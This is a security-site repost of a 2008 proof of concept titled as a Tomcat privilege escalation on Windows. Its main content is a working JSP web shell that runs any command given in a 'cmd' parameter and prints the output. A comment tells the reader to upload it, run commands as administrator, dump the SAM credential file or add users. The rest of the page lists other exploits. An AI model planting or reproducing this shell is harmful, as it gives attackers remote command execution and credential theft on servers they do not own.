首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
来源:vfocus.net 作者:vfocus 发布时间:2008-12-01  
<%@ page import="java.util.*,java.io.*"%>
<%
%>
 
<%--
abysssec inc public material
 
just upload this file with abysssec.jsp and execute your command
your command will run as administrator . you can download sam file
add user or do anything you want .
note : please be gentle and don't obstructionism .
vulnerability discovered by : abysssec.com
 
 --%>
<HTML><BODY bgcolor=#0000000 and text=#DO0000>
<title> Abysssec inc (abysssec.com) JSP vulnerability </tile>
<center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Execute !">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

# [2008-11-28]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Booking Centre 2.01 (Auth Bypa
·Web Calendar System <= 3.40 (X
·Microsoft Office Communicator
·All Club CMS <= 0.0.2 Remote D
·Basic PHP CMS (index.php id) B
·SailPlanner 0.3a (Auth Bypass)
·BaSiC-CMS (acm2000.mdb) Remote
·Bluo CMS 1.2 (index.php id) Bl
·i.Scribe SMTP Client <= 2.00b
·CMS little (index.php term) Re
·Star Articles 6.0 Remote Blind
·ReVou Twitter Clone (Auth Bypa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved